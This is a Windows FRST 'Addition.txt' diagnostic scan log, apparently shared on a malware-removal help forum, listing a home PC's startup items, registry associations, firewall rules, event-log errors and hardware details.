2019-05-15 03:48 - 2019-05-15 03:48 - 000228864 _____ (Intel Corporation) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorDataMgr\3addc459b592a3e877c7cef64f7692b4\IAStorDataMgr.ni.dll
2019-05-15 03:48 - 2019-05-15 03:48 - 000019968 _____ (Intel Corporation) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorDataMgrSvc\6ce56668644b82def19ce6ae4f6ae24a\IAStorDataMgrSvc.ni.exe
2019-05-15 03:48 - 2019-05-15 03:48 - 000488960 _____ (Intel Corporation) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_32\IAStorUtil\c399f4c04590f1e91caf42a4cdedd686\IAStorUtil.ni.dll
2013-03-18 01:10 - 2013-03-18 01:10 - 000225280 _____ (Microsoft Corporation) [File not signed] C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcm90.dll
2015-09-04 16:34 - 2015-09-04 16:34 - 001374208 ____R (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files (x86)\Fitbit Connect\LIBEAY32.dll
2013-12-02 20:49 - 2017-01-27 12:01 - 000910336 ____T (Webroot, Inc.) [File not signed] C:\ProgramData\WRData\PKG\wrPhreshPhish.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mbamchameleon => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRkrn => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRSVC => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
HKU\.DEFAULT\Software\Classes\exefile: "%1" %* <==== ATTENTION
HKU\.DEFAULT\Software\Classes\.exe: exefile => "%1" %* <==== ATTENTION
HKU\S-1-5-21-441904776-594677368-125994074-1001\Software\Classes\exefile: "%1" %* <==== ATTENTION
HKU\S-1-5-21-441904776-594677368-125994074-1001\Software\Classes\.exe: exefile => "%1" %* <==== ATTENTION
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:34 - 2019-06-07 22:33 - 000000047 _____ C:\Windows\system32\drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\AMD APP\bin\x86_64;C:\Program Files (x86)\AMD APP\bin\x86;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static
HKU\S-1-5-21-441904776-594677368-125994074-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\richard\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: ) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
If an entry is included in the fixlist, it will be removed.
 
MSCONFIG\startupfolder: C:^Users^richard^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Axis & Allies Registration.lnk => C:\Windows\pss\Axis & Allies Registration.lnk.Startup
MSCONFIG\startupfolder: C:^Users^richard^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Launch Utility Application.lnk => C:\Windows\pss\Launch Utility Application.lnk.Startup
MSCONFIG\startupreg: AceStream => C:\Users\richard\AppData\Roaming\ACEStream\engine\ace_engine.exe
MSCONFIG\startupreg: CanonMyPrinter => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon
MSCONFIG\startupreg: CanonSolutionMenuEx => C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE /logon
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: FAHConsole => C:\Program Files\File Association Helper\FAHConsole.exe
MSCONFIG\startupreg: Fitbit Connect => "C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe" /autorun
MSCONFIG\startupreg: IAStorIcon => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIconLaunch.exe "C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe" 60
MSCONFIG\startupreg: MouseDriver => TiltWheelMouse.exe
MSCONFIG\startupreg: Open Download Manager => C:\Program Files (x86)\OpenDownloaderManager\odm.exe -autorun
MSCONFIG\startupreg: RtHDVBg_DTS => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /DTSU2P 
MSCONFIG\startupreg: RTHDVCPL => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s
MSCONFIG\startupreg: StartCCC => "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
MSCONFIG\startupreg: USB3MON => "C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
MSCONFIG\startupreg: WRSVC => "C:\Program Files\Webroot\WRSA.exe" -ul
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{C94B7BBA-7528-4065-A327-32837718CFBA}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{FEBDE4F8-1509-448A-AD50-B7E09C433AF3}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{D780D2D3-2C6E-4A4B-808C-291839ED713A}] => (Allow) svchost.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{C35302F7-0F1C-4ED8-AB13-F999E2E89E74}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{17D78CF6-8C13-4199-B417-A22E79D2E706}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{59A21C6F-8BA5-40FF-8610-F36A1BD2C743}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{E0D16B7F-53C4-40B2-A4F0-90293F41F232}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{D05485F0-F03D-4FBB-AA6B-5895DC166E4B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{E1E8B1FF-3FEB-4C7C-A4CA-1B8730D6AB12}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
 
==================== Restore Points =========================
 
17-07-2019 10:19:43 Scheduled Checkpoint
22-07-2019 08:37:35 Windows Update
22-07-2019 13:30:00 Malwarebytes Anti-Rootkit Restore Point
24-07-2019 06:23:48 Windows Update
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (07/25/2019 02:55:13 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (07/24/2019 06:12:57 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (07/24/2019 05:07:51 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_SysMain, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1
Faulting module name: sysmain.dll, version: 6.1.7601.24000, time stamp: 0x5a499a8d
Exception code: 0xc0000005
Fault offset: 0x00000000000189da
Faulting process id: 0xba8
Faulting application start time: 0x01d541bbf87c525c
Faulting application path: C:\Windows\system32\svchost.exe
Faulting module path: c:\windows\system32\sysmain.dll
Report Id: e5214406-adfa-11e9-9e7d-60a44c3dd8c8
 
Error: (07/23/2019 08:07:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (07/23/2019 08:35:34 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (07/23/2019 08:27:36 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (07/23/2019 08:13:38 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
Error: (07/22/2019 02:09:03 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
 
 
System errors:
=============
Error: (07/24/2019 05:07:53 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Superfetch service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.
 
Error: (07/23/2019 08:07:49 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The WMI Performance Adapter service failed to start due to the following error: 
The service did not respond to the start or control request in a timely fashion.
 
Error: (07/23/2019 08:07:49 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the WMI Performance Adapter service to connect.
 
Error: (07/23/2019 08:33:12 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (07/23/2019 08:27:06 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (07/23/2019 08:27:01 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (07/23/2019 08:26:53 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error: 
The dependency service or group failed to start.
 
Error: (07/23/2019 08:26:53 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error: 
The dependency service or group failed to start.
 
 
Windows Defender:
===================================
Date: 2019-01-23 21:23:31.336
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version:1.285.6.0
Previous Signature Version:1.283.3544.0
Update Source:User
Signature Type:AntiSpyware
Update Type:Full
Current Engine Version:1.1.15600.4
Previous Engine Version:1.1.15600.4
Error code:0x8050a005
Error description:The program can't find definition files that help detect unwanted software. Check for updates to the definition files, and then try again. For information on installing updates, see Help and Support. 
 
Date: 2018-04-05 00:58:28.414
Description: 
Windows Defender has encountered an error trying to load signatures and will attempt reverting back to a known-good set of signatures.
Signatures Attempted:Current
Error Code:0x80070002
Error description:The system cannot find the file specified. 
Signature version:0.0.0.0
Engine version:0.0.0.0
 
Date: 2018-04-05 00:58:28.398
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version:
Previous Signature Version:
Update Source:Signature Update Folder
Signature Type:AntiSpyware
Update Type:Delta
Current Engine Version:
Previous Engine Version:
Error code:0x80070002
Error description:The system cannot find the file specified. 
 
CodeIntegrity:
===================================
 
Date: 2019-07-25 20:08:54.044
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-07-25 19:19:22.783
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-07-25 18:29:44.811
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-07-25 18:15:31.109
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-07-25 15:54:22.540
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-07-25 14:58:37.004
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-07-25 06:11:07.544
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
Date: 2019-07-25 03:39:22.387
Description: 
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\sxs.dll because the set of per-page image hashes could not be found on the system.
 
==================== Memory info =========================== 
 
BIOS: American Megatrends Inc. 1708 11/09/2012
Motherboard: ASUSTeK COMPUTER INC. P8Z77-V PRO
Processor: Intel(R) Core(TM) i5-3570K CPU @ 3.40GHz
Percentage of memory in use: 56%
Total physical RAM: 8132.69 MB
Available physical RAM: 3578.37 MB
Total Virtual: 16263.52 MB
Available Virtual: 10885.88 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:931.41 GB) (Free:607.37 GB) NTFS
Drive d: (Madame Fate EN) (CDROM) (Total:0.22 GB) (Free:0 GB) UDF
 
\\?\Volume{ea62f4d6-84bc-11e2-a5b9-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: E4B0DEA2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================

Ask AI

AI can make mistakes. Check the cited posts. Archived advice can be out-of-date

Don't include personal information. Questions and selected public posts go to OpenAI. About Ask AI